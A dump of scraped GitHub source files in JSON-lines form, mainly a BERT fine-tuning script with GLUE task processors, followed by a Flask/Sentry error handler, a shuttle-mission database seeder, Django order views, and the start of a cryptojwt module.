tab separated value file.\"\"\"\n with open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n if sys.version_info[0] == 2:\n line = list(unicode(cell, 'utf-8') for cell in line)\n lines.append(line)\n return lines\n\n @classmethod\n def _read_rgx(cls, input_file, rgx):\n patt = re.compile(rgx)\n lines = []\n with open(input_file) as f:\n for line in f:\n m = re.match(rgx, line.strip())\n if not m:\n continue\n lines.append(m.groups())\n return lines\n\n\nclass MrpcProcessor(DataProcessor):\n \"\"\"Processor for the MRPC data set (GLUE version).\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n logger.info(\"LOOKING AT {}\".format(os.path.join(data_dir, \"train.tsv\")))\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\")\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"0\", \"1\"]\n\n def _create_examples(self, lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n for (i, line) in enumerate(lines):\n if i == 0:\n continue\n guid = \"%s-%s\" % (set_type, i)\n text_a = line[3]\n text_b = line[4]\n label = line[0]\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))\n return examples\n\n\nclass RteProcessor(DataProcessor):\n \"\"\"Processor for the RTE data set (GLUE version).\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\")\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"entailment\", \"not_entailment\"]\n\n def _create_examples(self, lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n for (i, line) in enumerate(lines):\n if i == 0:\n continue\n guid = \"%s-%s\" % (set_type, line[0])\n text_a = line[1]\n text_b = line[2]\n label = line[-1]\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))\n return examples\n\nclass RawPairProcessor(DataProcessor):\n\n def get_train_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")) , \"dev\")\n\n def get_test_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"test\")\n\n def get_labels(self):\n return [\"0\", \"1\"]\n\n def _create_examples(self, lines, set_type):\n examples = []\n for i, line in enumerate(lines):\n guid = \"%s - %s\" % (set_type, i)\n question_a = line[0]\n question_b = line[1]\n label = \"0\"\n examples.append(InputExample(guid=guid, text_a=question_a, text_b=question_b, label=label))\n return examples \n\nclass RawSTSPairProcessor(DataProcessor):\n\n def get_train_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")) , \"dev\")\n\n def get_test_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"test\")\n\n def get_labels(self):\n return [\"\"]\n\n def _create_examples(self, lines, set_type):\n examples = []\n for i, line in enumerate(lines):\n guid = \"%s - %s\" % (set_type, i)\n question_a = line[0]\n question_b = line[1]\n label = 0.1\n examples.append(InputExample(guid=guid, text_a=question_a, text_b=question_b, label=label))\n return examples \n\nclass QnliProcessor(DataProcessor):\n \"\"\"Processor for the STS-B data set (GLUE version).\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \n \"dev_matched\")\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"entailment\", \"not_entailment\"]\n\n def _create_examples(self, lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n for (i, line) in enumerate(lines):\n if i == 0:\n continue\n guid = \"%s-%s\" % (set_type, line[0])\n text_a = line[1]\n text_b = line[2]\n label = line[-1]\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))\n return examples\n\nclass QuoraProcessor(DataProcessor):\n \"\"\"Processor for Quora Question duplicate dataset (GLUE Version)\"\"\"\n def get_train_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"dev.tsv\")) , \"dev\")\n\n def get_test_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\")\n\n def get_labels(self):\n return [\"0\", \"1\"]\n\n def _create_examples(self, lines, set_type):\n examples = []\n for i, line in enumerate(lines):\n if i == 0 :\n continue\n if len(line) != 6:\n continue\n guid = \"%s - %s\" % (set_type, i)\n question_a = line[3]\n question_b = line[4]\n if set_type == \"test\":\n label = \"0\"\n else:\n label = line[5]\n examples.append(InputExample(guid=guid, text_a=question_a, text_b=question_b, label=label))\n return examples \n\n\nclass MnliProcessor(DataProcessor):\n \"\"\"Processor for the MultiNLI data set (GLUE version).\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"dev_matched.tsv\")),\n \"dev_matched\")\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"0\", \"1\", \"2\"]\n# return [\"contradiction\", \"entailment\", \"neutral\"]\n\n def _create_examples(self, lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n for (i, line) in enumerate(lines):\n if i == 0:\n continue\n guid = \"%s-%s\" % (set_type, line[0])\n text_a = line[8]\n text_b = line[9]\n label = line[-1]\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))\n return examples\n\n\nclass STSProcessor(DataProcessor):\n \"\"\"Processor for the CoLA data set (GLUE version).\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\")\n \n def get_test_examples(self, data_dir):\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\")\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"\"]\n\n def _create_examples(self, lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n for (i, line) in enumerate(lines):\n if i == 0:\n continue\n guid = \"%s-%s\" % (set_type, i)\n text_a = line[7]\n text_b = line[8]\n label = float(line[9])\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))\n return examples\n\n\nclass ColaProcessor(DataProcessor):\n \"\"\"Processor for the CoLA data set (GLUE version).\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n return self._create_examples(\n self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\")\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"0\", \"1\"]\n\n def _create_examples(self, lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n for (i, line) in enumerate(lines):\n guid = \"%s-%s\" % (set_type, i)\n text_a = line[3]\n label = line[1]\n examples.append(\n InputExample(guid=guid, text_a=text_a, text_b=None, label=label))\n return examples\n\n\nclass SST2Processor(DataProcessor):\n \"\"\"Processor for the SST-2 data set (GLUE version).\"\"\"\n\n def get_train_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n train_file = \"stsa.binary.phrases.train\"\n return self._create_examples(\n self._read_rgx(os.path.join(data_dir, train_file), r\"^(\\d)\\s(.+)$\"), \"train\")\n\n def get_dev_examples(self, data_dir):\n \"\"\"See base class.\"\"\"\n dev_file = \"stsa.binary.dev\"\n return self._create_examples(\n self._read_rgx(os.path.join(data_dir, dev_file), r\"^(\\d)\\s(.+)$\"), \"dev\")\n\n def get_test_examples(self, data_dir):\n test_file = \"stsa.binary.test\"\n return self._create_examples(\n self._read_rgx(os.path.join(data_dir, test_file), r\"^(\\d)\\s(.+)$\"), \"test\")\n\n def get_labels(self):\n \"\"\"See base class.\"\"\"\n return [\"0\", \"1\"]\n\n def _create_examples(self, lines, set_type):\n \"\"\"Creates examples for the training and dev sets.\"\"\"\n examples = []\n for i, line in enumerate(lines):\n guid = \"%s-%s\" % (set_type, i)\n label = line[0]\n text_a = line[1]\n examples.append(InputExample(guid=guid, text_a=text_a, text_b=None, label=label))\n return examples\n\n\nclass IMDBSentenceProcessor(DataProcessor):\n\n def get_train_examples(self, data_dir):\n train_file = os.path.join(data_dir, \"train.tsv\")\n with open(train_file) as f:\n lines = f.readlines()\n return self._create_examples(lines)\n\n def get_dev_examples(self, data_dir):\n \"\"\"Stub\"\"\"\n return self.get_train_examples(data_dir)\n\n def get_test_examples(self, data_dir):\n \"\"\"Stub\"\"\"\n return self.get_train_examples(data_dir)\n\n def get_labels(self):\n return [\"0\", \"1\"]\n\n def _create_examples(self, lines):\n examples = []\n for i, line in enumerate(tqdm(lines)):\n guid = f\"guid-{i}\"\n examples.append(InputExample(guid=guid, text_a=line.strip(), label=\"0\", text_b=None))\n return examples\n\n\ndef convert_examples_to_features(examples, label_list, max_seq_length, tokenizer):\n \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\"\n\n label_map = {label : i for i, label in enumerate(label_list)}\n\n features = []\n for (ex_index, example) in enumerate(tqdm(examples)):\n tokens_a = tokenizer.tokenize(example.text_a)\n\n tokens_b = None\n if example.text_b:\n tokens_b = tokenizer.tokenize(example.text_b)\n # Modifies `tokens_a` and `tokens_b` in place so that the total\n # length is less than the specified length.\n # Account for [CLS], [SEP], [SEP] with \"- 3\"\n _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)\n else:\n # Account for [CLS] and [SEP] with \"- 2\"\n if len(tokens_a) > max_seq_length - 2:\n tokens_a = tokens_a[:(max_seq_length - 2)]\n\n # The convention in BERT is:\n # (a) For sequence pairs:\n # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) For single sequences:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # Where \"type_ids\" are used to indicate whether this is the first\n # sequence or the second sequence. The embedding vectors for `type=0` and\n # `type=1` were learned during pre-training and are added to the wordpiece\n # embedding vector (and position vector). This is not *strictly* necessary\n # since the [SEP] token unambigiously separates the sequences, but it makes\n # it easier for the model to learn the concept of sequences.\n #\n # For classification tasks, the first vector (corresponding to [CLS]) is\n # used as as the \"sentence vector\". Note that this only makes sense because\n # the entire model is fine-tuned.\n tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"]\n segment_ids = [0] * len(tokens)\n\n if tokens_b:\n tokens += tokens_b + [\"[SEP]\"]\n segment_ids += [1] * (len(tokens_b) + 1)\n\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only real\n # tokens are attended to.\n input_mask = [1] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding = [0] * (max_seq_length - len(input_ids))\n input_ids += padding\n input_mask += padding\n segment_ids += padding\n\n assert len(input_ids) == max_seq_length\n assert len(input_mask) == max_seq_length\n assert len(segment_ids) == max_seq_length\n \n label_id = example.label if isinstance(example.label, float) else label_map[example.label]\n if ex_index < 5:\n logger.info(\"*** Example ***\")\n logger.info(\"guid: %s\" % (example.guid))\n logger.info(\"tokens: %s\" % \" \".join(\n [str(x) for x in tokens]))\n logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))\n logger.info(\"input_mask: %s\" % \" \".join([str(x) for x in input_mask]))\n logger.info(\n \"segment_ids: %s\" % \" \".join([str(x) for x in segment_ids]))\n logger.info(\"label: %s (id = %d)\" % (example.label, label_id))\n\n features.append(\n InputFeatures(input_ids=input_ids,\n input_mask=input_mask,\n segment_ids=segment_ids,\n label_id=label_id))\n return features\n\n\ndef _truncate_seq_pair(tokens_a, tokens_b, max_length):\n \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\"\n\n # This is a simple heuristic which will always truncate the longer sequence\n # one token at a time. This makes more sense than truncating an equal percent\n # of tokens from each, since if one sequence is very short then each token\n # that's truncated likely contains more information than a longer sequence.\n while True:\n total_length = len(tokens_a) + len(tokens_b)\n if total_length <= max_length:\n break\n if len(tokens_a) > len(tokens_b):\n tokens_a.pop()\n else:\n tokens_b.pop()\n\ndef accuracy(out, labels):\n outputs = np.argmax(out, axis=1)\n return np.sum(outputs == labels)\n\ndef main():\n def evaluate(dataloader, export=None):\n eval_loss, eval_accuracy = 0, 0\n nb_eval_steps, nb_eval_examples = 0, 0\n logits_list = []\n iter_idx = 0\n corr_x = []\n corr_y = []\n for input_ids, input_mask, segment_ids, label_ids in tqdm(dataloader, desc=\"Evaluating\"):\n input_ids = input_ids.to(device)\n input_mask = input_mask.to(device)\n segment_ids = segment_ids.to(device)\n label_ids = label_ids.to(device)\n\n with torch.no_grad():\n tmp_eval_loss = model(input_ids, segment_ids, input_mask, label_ids, mse=is_float)\n logits = model(input_ids, segment_ids, input_mask, mse=is_float)\n\n logits = logits.detach().cpu().numpy()\n if export is not None:\n logits_list.append(logits)\n label_ids = label_ids.to('cpu').numpy()\n if is_float:\n corr_x.extend(logits.flatten())\n corr_y.extend(label_ids.flatten())\n tmp_eval_accuracy = accuracy(logits, label_ids)\n\n eval_loss += tmp_eval_loss.mean().item()\n eval_accuracy += tmp_eval_accuracy\n\n nb_eval_examples += input_ids.size(0)\n nb_eval_steps += 1\n # if (iter_idx + 1) % 1000 == 0 and export is not None:\n # torch.save((iter_idx, logits_list), export)\n iter_idx += 1\n if export is not None:\n torch.save(logits_list, export)\n\n eval_loss = eval_loss / nb_eval_steps\n eval_accuracy = eval_accuracy / nb_eval_examples\n loss = tr_loss/nb_tr_steps if args.do_train else None\n if is_float:\n print(pearsonr(corr_x, corr_y))\n print(spearmanr(corr_x, corr_y))\n result = {'eval_loss': eval_loss,\n 'eval_accuracy': eval_accuracy,\n 'global_step': global_step,\n 'loss': loss}\n return result\n\n local_rank = -1\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", \"-c\", type=str, required=True)\n args, _ = parser.parse_known_args()\n options = argconf.options_from_json(\"confs/options.json\")\n config = argconf.config_from_json(args.config)\n args = edict(argconf.parse_args(options, config))\n print(f\"Using config: {args}\")\n set_seed(args.seed)\n args.do_train = args.do_train and not args.do_test_only\n\n processors = {\n \"cola\": ColaProcessor,\n \"mnli\": MnliProcessor,\n \"mrpc\": MrpcProcessor,\n \"sst2\": SST2Processor,\n 'qnli': QnliProcessor,\n 'rte': RteProcessor,\n \"imdb\": IMDBSentenceProcessor,\n \"raw_single\": IMDBSentenceProcessor, # This is not a mistake, just poor naming.\n \"qqp\": QuoraProcessor,\n \"sts\": STSProcessor,\n \"raw_sts_pair\": RawSTSPairProcessor,\n \"raw_pair\": RawPairProcessor\n }\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n n_gpu = torch.cuda.device_count()\n logger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format(\n device, n_gpu, bool(local_rank != -1), args.fp16))\n\n if args.gradient_accumulation_steps < 1:\n raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(\n args.gradient_accumulation_steps))\n\n args.train_batch_size = args.train_batch_size // args.gradient_accumulation_steps\n\n if not args.do_train and not args.do_eval:\n raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\")\n\n # if os.path.exists(args.workspace) and os.listdir(args.workspace) and args.do_train:\n # raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.workspace))\n if not os.path.exists(args.workspace):\n os.makedirs(args.workspace)\n\n task_name = args.task_name.lower()\n\n if task_name not in processors:\n raise ValueError(\"Task not found: %s\" % (task_name))\n\n processor = processors[task_name]()\n num_labels = args.n_labels\n label_list = processor.get_labels()\n\n tokenizer = BertTokenizer.from_pretrained(args.model_file, do_lower_case=args.uncased)\n\n num_train_optimization_steps = None\n train_examples = processor.get_train_examples(args.data_dir)\n num_train_optimization_steps = int(\n len(train_examples) / args.train_batch_size / args.gradient_accumulation_steps) * args.num_train_epochs\n if local_rank != -1:\n num_train_optimization_steps = num_train_optimization_steps // torch.distributed.get_world_size()\n\n # Prepare model\n cache_dir = os.path.join(PYTORCH_PRETRAINED_BERT_CACHE, 'distributed_{}'.format(local_rank))\n model = BertForSequenceClassification.from_pretrained(args.model_file,\n cache_dir=cache_dir,\n num_labels=num_labels)\n if args.fp16:\n model.half()\n model.to(device)\n # sd = torch.load('qqp.pt')\n # sd = torch.load('sts.pt')\n # del sd['classifier.weight']\n # del sd['classifier.bias']\n # model.load_state_dict(sd, strict=False)\n if local_rank != -1:\n try:\n from apex.parallel import DistributedDataParallel as DDP\n except ImportError:\n raise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n model = DDP(model)\n elif n_gpu > 1:\n model = torch.nn.DataParallel(model)\n\n # Prepare optimizer\n param_optimizer = list(model.named_parameters())\n param_optimizer = list(filter(lambda x: x[0] in (\"module.classifier.weight\", \"module.classifier.bias\"), param_optimizer))\n print(len(param_optimizer))\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n if args.fp16:\n try:\n from apex.optimizers import FP16_Optimizer\n from apex.optimizers import FusedAdam\n except ImportError:\n raise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n\n optimizer = FusedAdam(optimizer_grouped_parameters,\n lr=args.learning_rate,\n bias_correction=False,\n max_grad_norm=1.0)\n if args.loss_scale == 0:\n optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)\n else:\n optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)\n\n else:\n optimizer = BertAdam(optimizer_grouped_parameters,\n lr=args.learning_rate,\n warmup=args.warmup_proportion,\n t_total=num_train_optimization_steps)\n\n global_step = 0\n nb_tr_steps = 0\n tr_loss = 0\n train_features = convert_examples_to_features(\n train_examples, label_list, args.max_seq_length, tokenizer)\n is_float = isinstance(train_features[0].label_id, float)\n all_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)\n all_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)\n all_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)\n all_label_ids = torch.tensor([f.label_id for f in train_features], dtype=torch.float if is_float else torch.long)\n train_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)\n if local_rank == -1:\n train_sampler = RandomSampler(train_data)\n else:\n train_sampler = DistributedSampler(train_data)\n train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)\n # BEGIN SST-2 -> QQP experiments\n # END SST-2 -> QQP experiments\n if args.do_train:\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", len(train_examples))\n logger.info(\" Batch size = %d\", args.train_batch_size)\n logger.info(\" Num steps = %d\", num_train_optimization_steps)\n\n model.train()\n for _ in trange(int(args.num_train_epochs), desc=\"Epoch\"):\n tr_loss = 0\n nb_tr_examples, nb_tr_steps = 0, 0\n for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n batch = tuple(t.to(device) for t in batch)\n input_ids, input_mask, segment_ids, label_ids = batch\n loss = model(input_ids, segment_ids, input_mask, label_ids, mse=is_float)\n if n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu.\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n\n if args.fp16:\n optimizer.backward(loss)\n else:\n loss.backward()\n\n tr_loss += loss.item()\n nb_tr_examples += input_ids.size(0)\n nb_tr_steps += 1\n if (step + 1) % args.gradient_accumulation_steps == 0:\n if args.fp16:\n # modify learning rate with special warm up BERT uses\n # if args.fp16 is False, BertAdam is used that handles this automatically\n lr_this_step = args.learning_rate * warmup_linear(global_step/num_train_optimization_steps, args.warmup_proportion)\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr_this_step\n optimizer.step()\n optimizer.zero_grad()\n global_step += 1\n\n output_model_file = os.path.join(args.workspace, WEIGHTS_NAME)\n if args.do_train:\n # Save a trained model and the associated configuration\n model_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self\n torch.save(model_to_save.state_dict(), output_model_file)\n output_config_file = os.path.join(args.workspace, CONFIG_NAME)\n with open(output_config_file, 'w') as f:\n f.write(model_to_save.config.to_json_string())\n\n # Load a trained model and config that you have fine-tuned\n config = BertConfig(output_config_file)\n model = BertForSequenceClassification(config, num_labels=num_labels)\n model.load_state_dict(torch.load(output_model_file))\n elif args.do_test_only:\n convert = convert_single_to_dp if isinstance(model, torch.nn.DataParallel) else convert_dp_to_single\n model.load_state_dict(convert(torch.load(output_model_file)))\n else:\n # pass\n model = BertForSequenceClassification.from_pretrained(args.model_file, num_labels=num_labels)\n model.to(device)\n\n if args.export:\n model.eval()\n train_dataloader = DataLoader(train_data, batch_size=args.eval_batch_size, shuffle=False)\n with torch.no_grad():\n evaluate(train_dataloader, export=args.export)\n return\n\n if args.visualize:\n model.eval()\n train_dataloader = DataLoader(train_data, batch_size=args.eval_batch_size, shuffle=False)\n with open(os.path.join(args.workspace, \"viz_results.csv\"), \"w\") as f:\n writer = None\n\n if args.do_eval and (local_rank == -1 or torch.distributed.get_rank() == 0):\n eval_examples = processor.get_test_examples(args.data_dir) if args.do_test_only else processor.get_dev_examples(args.data_dir)\n eval_features = convert_examples_to_features(\n eval_examples, label_list, args.max_seq_length, tokenizer)\n logger.info(\"***** Running evaluation *****\")\n logger.info(\" Num examples = %d\", len(eval_examples))\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n all_input_ids = torch.tensor([f.input_ids for f in eval_features], dtype=torch.long)\n all_input_mask = torch.tensor([f.input_mask for f in eval_features], dtype=torch.long)\n all_segment_ids = torch.tensor([f.segment_ids for f in eval_features], dtype=torch.long)\n all_label_ids = torch.tensor([f.label_id for f in eval_features], dtype=torch.long if isinstance(eval_features[0].label_id, int) else torch.float)\n eval_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)\n # Run prediction for full data\n eval_sampler = SequentialSampler(eval_data)\n eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size)\n\n model.eval()\n result = evaluate(eval_dataloader)\n\n output_eval_file = os.path.join(args.workspace, \"eval_results.txt\")\n with open(output_eval_file, \"w\") as writer:\n logger.info(\"***** Eval results *****\")\n for key in sorted(result.keys()):\n logger.info(\" %s = %s\", key, str(result[key]))\n writer.write(\"%s = %s\\n\" % (key, str(result[key])))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"castorini/d-bert","sub_path":"dbert/finetune/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":34220,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"32"} +{"seq_id":"21556786347","text":"import logging\n\nimport sentry_sdk\nfrom flask import render_template\nfrom sentry_sdk.integrations.flask import FlaskIntegration\nfrom sentry_sdk.integrations.logging import LoggingIntegration\nfrom sentry_sdk.integrations.redis import RedisIntegration\nfrom sentry_sdk.integrations.sqlalchemy import SqlalchemyIntegration\nfrom spinach.contrib.sentry_sdk_spinach import SpinachIntegration\n\n\ndef init_app(app):\n @app.errorhandler(404)\n def page_not_found(e):\n return render_template(\"error.html\"), 404\n\n @app.errorhandler(403)\n def forbidden(error):\n return render_template(\"forbidden.html\"), 403\n\n @app.errorhandler(500)\n def error(error):\n return render_template(\"error.html\"), 500\n\n sentry_sdk.init(\n integrations=[\n LoggingIntegration(\n level=logging.INFO, # Capture info and above as breadcrumbs\n event_level=logging.ERROR, # Send errors as events\n ),\n FlaskIntegration(),\n SpinachIntegration(send_retries=False),\n SqlalchemyIntegration(),\n RedisIntegration(),\n ],\n request_bodies=\"always\",\n with_locals=True,\n )\n","repo_name":"jazzband/website","sub_path":"jazzband/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"32"} +{"seq_id":"41899763576","text":"import json\nfrom webapp.database.dbcomm import db_session\nfrom webapp.database.models import ShuttleMission, ListLandingSite, ListShuttle\n\ndef convert_to_minutes(time_str):\n '''\n Function converts the time string ##d ##h ##m\n into minutes\n '''\n mins = 0\n times = time_str.split(' ')\n for time in times:\n if 'd' in time:\n mins = mins + int(time[:2]) * 1440\n elif 'h' in time:\n mins = mins + int(time[:2]) * 60\n elif 'm' in time:\n mins = mins + (int(time[:2]))\n return mins\n\ndef read_missions_json():\n '''\n Function reads the JSON file where all the shuttle\n missions data is located.\n '''\n # Open up the JSON File that contains the wiki scraped info\n with open('missions.json') as f:\n missions = json.load(f)\n missions = missions[0]['shuttle_missions']\n return missions\n\ndef seed_database(missions):\n '''\n Function take the missions Dictionary and stores\n all the data onto the database.\n '''\n\n for mission in missions:\n # Check if the shuttle already exists on the Shuttle list table\n # If new, add the shuttle to the datatable first.\n shuttle = ListShuttle.query.filter(ListShuttle.shuttle_name == mission['Shuttle']).first()\n if shuttle == None:\n shuttle = ListShuttle(mission['Shuttle'])\n session.add(shuttle)\n session.commit()\n\n # Check if the landing site already exists on the Landing Site list table\n # If new, add the site to the datatable first.\n landing_site = ListLandingSite.query.filter(\n ListLandingSite.landing_name == mission['Landing site']).first()\n if landing_site == None:\n landing_site = ListLandingSite(mission['Landing site'])\n session.add(landing_site)\n session.commit()\n\n # Lastly add the mission to the Shuttle Mission table \n shuttle_mission = ShuttleMission(\n mission['Order'], mission['Crew'],\n convert_to_minutes(mission['Duration']),\n mission['Launch date'], mission['Mission'],\n mission['Notes'],\n shuttle=shuttle, landing_site=landing_site)\n\n session.add(shuttle_mission)\n session.commit()\n\n # mission = ShuttleMission()\n # print(\"{0} - {1}\".format(mission['Order'], mission['Mission']))\n print(\"Finished seeding database!\")\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n \n # Create a new database session & seed the database\n # with the data from the missions JSON \n session = db_session()\n missions = read_missions_json()\n seed_database(missions)","repo_name":"LuisFuentes/open-space-api","sub_path":"webapp/database/populateDB.py","file_name":"populateDB.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"836006869","text":"from django.shortcuts import render, reverse\nfrom .forms import *\nfrom .models import OrderItem\nfrom basket.basket import Basket\nfrom .models import Order, OrderItem\nfrom django.db import transaction\n\n\ndef add(request):\n basket = Basket(request)\n attachment = \"payment/upload_attachment.html\"\n data = dict(request.itmes())\n if request.user.is_authenticated:\n order_data = {\n \"full_name\": data.get('full_name'),\n \"email\": data.get('email'),\n \"phone\": data.get('phone'),\n \"net_total\": data.get('net_total'),\n }\n form = OrderForm(order_data)\n if form.is_valid():\n with transaction.atomic():\n order = form.save()\n for item in basket:\n order_item = OrderItem.objects.create(\n product=item['product'],\n price=item['price'],\n quantity=item['qnt'],\n order=order.pk\n )\n basket = basket.clear()\n print(basket)\n return render(request, attachment, {\"order_id\": order.pk})\n return render(\"payment/order_form.html\", {\"basket\": basket})\n\n return render(request, \"payment/order_form.html\", )\n\n\ndef upload_invoice(request):\n if request.method == 'POST':\n order_id = request.POST.get(\"order_id\")\n user = request.user\n form = OrderAttachmentForm(request.POST, request.FILES)\n if len(request.FILES) != 0 and form.is_valid():\n form.billing_status = True\n form.save()\n return render(request, \"payment/orderplaced.html\")\n\n return render(request, \"payment/upload_attachment.html\", {\"order_id\": order_id})\n\n\ndef user_orders(request):\n user_id = request.user.id\n orders = Order.objects.filter(user_id=user_id).filter(billing_status=True)\n return orders\n","repo_name":"cboy-sd/ecommerce_store","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37481858129","text":"import json\nimport logging\n\nfrom cryptojwt.jws.jws import factory\n\nfrom cryptojwt import key_bundle\nfrom oidcmsg import oidc\n\nfrom oidcmsg.exception import 